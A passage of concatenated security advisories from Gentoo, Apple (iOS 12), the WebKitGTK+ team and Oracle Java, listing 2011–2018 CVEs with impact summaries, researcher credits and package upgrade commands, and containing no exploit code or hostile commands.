WebKitGTK+. Please review the referenced CVE identifiers for details. Workaround ========== There is no known workaround at this time. Resolution ========== All WebkitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.22.0" References ========== [ 1 ] CVE-2018-4191 https://nvd.nist.gov/vuln/detail/CVE-2018-4191 [ 2 ] CVE-2018-4197 https://nvd.nist.gov/vuln/detail/CVE-2018-4197 [ 3 ] CVE-2018-4207 https://nvd.nist.gov/vuln/detail/CVE-2018-4207 [ 4 ] CVE-2018-4208 https://nvd.nist.gov/vuln/detail/CVE-2018-4208 [ 5 ] CVE-2018-4209 https://nvd.nist.gov/vuln/detail/CVE-2018-4209 [ 6 ] CVE-2018-4210 https://nvd.nist.gov/vuln/detail/CVE-2018-4210 [ 7 ] CVE-2018-4212 https://nvd.nist.gov/vuln/detail/CVE-2018-4212 [ 8 ] CVE-2018-4213 https://nvd.nist.gov/vuln/detail/CVE-2018-4213 [ 9 ] CVE-2018-4299 https://nvd.nist.gov/vuln/detail/CVE-2018-4299 [ 10 ] CVE-2018-4306 https://nvd.nist.gov/vuln/detail/CVE-2018-4306 [ 11 ] CVE-2018-4309 https://nvd.nist.gov/vuln/detail/CVE-2018-4309 [ 12 ] CVE-2018-4311 https://nvd.nist.gov/vuln/detail/CVE-2018-4311 [ 13 ] CVE-2018-4312 https://nvd.nist.gov/vuln/detail/CVE-2018-4312 [ 14 ] CVE-2018-4314 https://nvd.nist.gov/vuln/detail/CVE-2018-4314 [ 15 ] CVE-2018-4315 https://nvd.nist.gov/vuln/detail/CVE-2018-4315 [ 16 ] CVE-2018-4316 https://nvd.nist.gov/vuln/detail/CVE-2018-4316 [ 17 ] CVE-2018-4317 https://nvd.nist.gov/vuln/detail/CVE-2018-4317 [ 18 ] CVE-2018-4318 https://nvd.nist.gov/vuln/detail/CVE-2018-4318 [ 19 ] CVE-2018-4319 https://nvd.nist.gov/vuln/detail/CVE-2018-4319 [ 20 ] CVE-2018-4323 https://nvd.nist.gov/vuln/detail/CVE-2018-4323 [ 21 ] CVE-2018-4328 https://nvd.nist.gov/vuln/detail/CVE-2018-4328 [ 22 ] CVE-2018-4358 https://nvd.nist.gov/vuln/detail/CVE-2018-4358 [ 23 ] CVE-2018-4359 https://nvd.nist.gov/vuln/detail/CVE-2018-4359 [ 24 ] CVE-2018-4361 https://nvd.nist.gov/vuln/detail/CVE-2018-4361 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201812-04 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. License ======= Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2018-10-30-8 Additional information for APPLE-SA-2018-9-24-4 iOS 12 iOS 12 addresses the following: Accounts Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local app may be able to read a persistent account identifier Description: This issue was addressed with improved entitlements. CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. Auto Unlock Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to access local users AppleIDs Description: A validation issue existed in the entitlement verification. CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. Bluetooth Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7, iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation, 12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro, 9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic Description: An input validation issue existed in Bluetooth. CVE-2018-5383: Lior Neumann and Eli Biham CFNetwork Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative Entry added October 30, 2018 CoreFoundation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4412: The UK's National Cyber Security Centre (NCSC) Entry added October 30, 2018 CoreFoundation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4414: The UK's National Cyber Security Centre (NCSC) Entry added October 30, 2018 CoreMedia Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An app may be able to learn information about the current camera view before being granted camera access Description: A permissions issue existed. CVE-2018-4356: an anonymous researcher CoreText Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted text file may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2018-4347: an anonymous researcher Entry added October 30, 2018 Crash Reporter Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4333: Brandon Azad Grand Central Dispatch Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4426: Brandon Azad Entry added October 30, 2018 Heimdal Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4331: Brandon Azad CVE-2018-4332: Brandon Azad CVE-2018-4343: Brandon Azad Entry added October 30, 2018 iBooks Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information Description: A configuration issue was addressed with additional restrictions. CVE-2018-4355: evi1m0 of bilibili security team Entry added October 30, 2018 IOHIDFamily Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation CVE-2018-4408: Ian Beer of Google Project Zero Entry added October 30, 2018 IOKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to break out of its sandbox Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4341: Ian Beer of Google Project Zero CVE-2018-4354: Ian Beer of Google Project Zero Entry added October 30, 2018 IOKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2018-4383: Apple Entry added October 30, 2018 IOMobileFrameBuffer Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4335: Brandon Azad IOUserEthernet Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4401: Apple Entry added October 30, 2018 iTunes Store Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged network position may be able to spoof password prompts in the iTunes Store Description: An input validation issue was addressed with improved input validation. CVE-2018-4305: Jerry Decime Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to leak sensitive user information Description: An access issue existed with privileged API calls. CVE-2018-4399: Fabiano Anemone (@anoane) Entry added October 30, 2018 Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: An input validation issue existed in the kernel. CVE-2018-4363: Ian Beer of Google Project Zero Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged network position may be able to execute arbitrary code Description: A memory corruption issue was addressed with improved validation. CVE-2018-4407: Kevin Backhouse of Semmle Ltd. Entry added October 30, 2018 Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4336: Brandon Azad CVE-2018-4337: Ian Beer of Google Project Zero CVE-2018-4340: Mohamed Ghannam (@_simo36) CVE-2018-4344: The UK's National Cyber Security Centre (NCSC) CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative, Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero Day Initiative Entry added October 30, 2018 mDNSOffloadUserClient Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4326: an anonymous researcher working with Trend Micro's Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team Entry added October 30, 2018 MediaRemote Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: An access issue was addressed with additional sandbox restrictions. CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs Entry added October 30, 2018 Messages Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to discover a user's deleted messages Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western Governor's University (WGU) Notes Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to discover a user's deleted notes Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4352: Utku Altinkaynak Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to discover websites a user has visited Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western Governor's University (WGU) Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A user may be unable to delete browsing history items Description: Clearing a history item may not clear visits with redirect chains. CVE-2018-4329: Hugo S. Diaz (coldpointblue) SafariViewController Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4362: Jun Kokatsu (@shhnjk) Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may be able to exfiltrate autofilled data in Safari Description: A logic issue was addressed with improved state management. CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2018-4395: Patrick Wardle of Digita Security Entry added October 30, 2018 Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker may be able to exploit weaknesses in the RC4 cryptographic algorithm Description: This issue was addressed by removing RC4. CVE-2016-1777: Pepi Zawodsky Status Bar Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to an iOS device may be able to determine the last used app from the lock screen Description: A logic issue was addressed with improved restrictions. CVE-2018-4325: Brian Adeloye Symptom Framework Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative Entry added October 30, 2018 Text Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted text file may lead to a denial of service Description: A denial of service issue was addressed with improved validation. CVE-2018-4304: jianan.huang (@Sevck) Entry added October 30, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero Day Initiative CVE-2018-4323: Ivan Fratric of Google Project Zero CVE-2018-4328: Ivan Fratric of Google Project Zero CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with Trend Micro's Zero Day Initiative CVE-2018-4359: Samuel GroA (@5aelo) CVE-2018-4360: William Bowling (@wcbowling) Entry added October 30, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may cause unexepected cross-origin behavior Description: A cross-origin issue existed with "iframe" elements. CVE-2018-4319: John Pettitt of Google WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2018-4345: an anonymous researcher WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Unexpected interaction causes an ASSERT failure Description: A memory corruption issue was addressed with improved validation. CVE-2018-4191: found by OSS-Fuzz WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Cross-origin SecurityErrors includes the accessed frame's origin Description: The issue was addressed by removing origin information. CVE-2018-4311: Erling Alf Ellingsen (@steike) WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may be able to execute scripts in the context of another website Description: A cross-site scripting issue existed in Safari. CVE-2018-4309: an anonymous researcher working with Trend Micro's Zero Day Initiative WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Unexpected interaction causes an ASSERT failure Description: A memory consumption issue was addressed with improved memory handling. CVE-2018-4361: found by OSS-Fuzz Additional recognition APFS We would like to acknowledge Umang Raghuvanshi for their assistance. Assets We would like to acknowledge Brandon Azad for their assistance. configd We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss GmbH for their assistance. Core Data We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security Labs GmbH for their assistance. CoreSymbolication We would like to acknowledge Brandon Azad for their assistance. Exchange ActiveSync We would like to acknowledge Jesse Thompson of University of Wisconsin-Madison for their assistance. Kernel We would like to acknowledge Brandon Azad for their assistance. Mail We would like to acknowledge Alessandro Avagliano of Rocket Internet SE, Gunnar Diepenbruck, and Zbyszek A>>A3Akiewski for their assistance. MediaRemote We would like to acknowledge Brandon Azad for their assistance. Safari We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad Galbin for their assistance. Security We would like to acknowledge Christoph Sinai, Daniel Dudek (@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak) of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson Ding, and an anonymous researcher for their assistance. SQLite We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security Labs GmbH for their assistance. Status Bar We would like to acknowledge Ju Zhu of Meituan and Moony Li and Lilang Wu of Trend Micro for their assistance. WebKit We would like to acknowledge Cary Hartline, Hanming Zhang from 360 Vuclan team, Tencent Keen Security Lab working with Trend Micro's Zero Day Initiative, and Zach Malone of CA Technologies for their assistance. Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 12". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgYpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HbuA// ZOEwXUyLVS3SqfEjU3MRUoTp1x+Ow+fd5co9B6v7bY+Ebc2KmSZjpPuNPjouRHmf RbWpZ0Mc52NYm+OdYqPu/Tg94wRi6tlrYusk6GngVH4IBER4TqiFrLNSzAjXL0xP qWv3JQcAIFNbNWpSEzDzEbuq85q4BIuP/+v2LpTc1ZWqIYt9TQHxUpyjoTXZvQhL 8L9ZM/dj8BC+m713LeC/KzveaDpaqnVJUDbgUkzRyFfFqOJt+hlaTS8yMUM3G+TX cblL8bvFNIxtUrt4Rf2TwDRVxUZIw/aFK2APmxVZ44UAT+2o+WFxBkHRXQiZc4Lk OaTzzkocdZu4q4MibrxELBWtW46AcGMqQKUpFZ6GR+4U2c1ICRwKnjQTn0iY7mg7 d+M+bTx8T2knwV7lSwvnHz79rysvOuCF3QCAZ4tW4PvLHWSZ0TpJho8z23PLHFQd J3cOYPby6SM9YP6SBISX5OI8xnvr1XIAPIBnOy0ScaMFsu0Er8j1hvbF1fXiaYOJ CSUUXR2th3jPW0g9L0j4vWGURG1h0psIN2MxTSHbmm4KXBAYngZ0wDOeJMUe8YMy IG0UBDqKNh8lzKHcc4aYA1WyaNsqbgbngBqDATp/XyWRzd+Py/U06MVuIaV095Rv s9WW67M1kLHy4BeutXt+xLBp9AugI+gU53uysxcnBx4= =dGPm -----END PGP SIGNATURE----- . Installation note: Safari 12 may be obtained from the Mac App Store. ----------------------------------------------------------------------- WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0007 ------------------------------------------------------------------------ Date reported : September 26, 2018 Advisory ID : WSA-2018-0007 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0007.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0007.html CVE identifiers : CVE-2018-4207, CVE-2018-4208, CVE-2018-4209, CVE-2018-4210, CVE-2018-4212, CVE-2018-4213, CVE-2018-4191, CVE-2018-4197, CVE-2018-4299, CVE-2018-4306, CVE-2018-4309, CVE-2018-4311, CVE-2018-4312, CVE-2018-4314, CVE-2018-4315, CVE-2018-4316, CVE-2018-4317, CVE-2018-4318, CVE-2018-4319, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358, CVE-2018-4359, CVE-2018-4361. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4207 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4208 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4209 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4210 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction with indexing types caused a failure. An array indexing issue existed in the handling of a function in JavaScriptCore. CVE-2018-4212 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4213 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4191 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4197 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4299 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Samuel GroI2 (saelo) working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4306 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4309 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to an anonymous researcher working with Trend Micro's Zero Day Initiative. A malicious website may be able to execute scripts in the context of another website. A cross-site scripting issue existed in WebKit. CVE-2018-4311 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Erling Alf Ellingsen (@steike). Cross-origin SecurityErrors includes the accessed frameas origin. CVE-2018-4312 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4314 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4315 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4316 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4317 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4318 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4319 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to John Pettitt of Google. A malicious website may cause unexepected cross-origin behavior. A cross-origin issue existed with iframe elements. CVE-2018-4323 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4328 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4358 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to @phoenhex team (@bkth_ @5aelo @_niklasb) working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4359 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Samuel GroA (@5aelo). Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4361 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK+ and WPE WebKit team, September 26, 2018
var-201304-0379 Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and 6 Update 43 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-1540. The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component. This vulnerability affects the following supported versions: 7 Update 17 , 6 Update 43. In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201401-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Oracle JRE/JDK: Multiple vulnerabilities Date: January 27, 2014 Bugs: #404071, #421073, #433094, #438706, #451206, #455174, #458444, #460360, #466212, #473830, #473980, #488210, #498148 ID: 201401-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in the Oracle JRE/JDK, allowing attackers to cause unspecified impact. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable! 2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 * 3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable! 4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 * 5 app-emulation/emul-linux-x86-java < 1.7.0.51 >= 1.7.0.51 * ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- NOTE: Packages marked with asterisks require manual intervention! ------------------------------------------------------------------- 5 affected packages Description =========== Multiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below for details. Impact ====== An unauthenticated, remote attacker could exploit these vulnerabilities to execute arbitrary code. Furthermore, a local or remote attacker could exploit these vulnerabilities to cause unspecified impact, possibly including remote execution of arbitrary code. Workaround ========== There is no known workaround at this time. Resolution ========== All Oracle JDK 1.7 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51" All Oracle JRE 1.7 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51" All users of the precompiled 32-bit Oracle JRE should upgrade to the latest version: # emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51" All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one of the newer Oracle packages like dev-java/oracle-jdk-bin or dev-java/oracle-jre-bin or choose another alternative we provide; eg. the IBM JDK/JRE or the open source IcedTea. References ========== [ 1 ] CVE-2011-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563 [ 2 ] CVE-2011-5035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035 [ 3 ] CVE-2012-0497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497 [ 4 ] CVE-2012-0498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498 [ 5 ] CVE-2012-0499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499 [ 6 ] CVE-2012-0500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500 [ 7 ] CVE-2012-0501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501 [ 8 ] CVE-2012-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502 [ 9 ] CVE-2012-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503 [ 10 ] CVE-2012-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504 [ 11 ] CVE-2012-0505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505 [ 12 ] CVE-2012-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506 [ 13 ] CVE-2012-0507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507 [ 14 ] CVE-2012-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547 [ 15 ] CVE-2012-1531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531 [ 16 ] CVE-2012-1532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532 [ 17 ] CVE-2012-1533 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533 [ 18 ] CVE-2012-1541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541 [ 19 ] CVE-2012-1682 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682 [ 20 ] CVE-2012-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711 [ 21 ] CVE-2012-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713 [ 22 ] CVE-2012-1716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716 [ 23 ] CVE-2012-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717 [ 24 ] CVE-2012-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718 [ 25 ] CVE-2012-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719 [ 26 ] CVE-2012-1721 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721 [ 27 ] CVE-2012-1722 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722 [ 28 ] CVE-2012-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723 [ 29 ] CVE-2012-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724 [ 30 ] CVE-2012-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725 [ 31 ] CVE-2012-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726 [ 32 ] CVE-2012-3136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136 [ 33 ] CVE-2012-3143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143 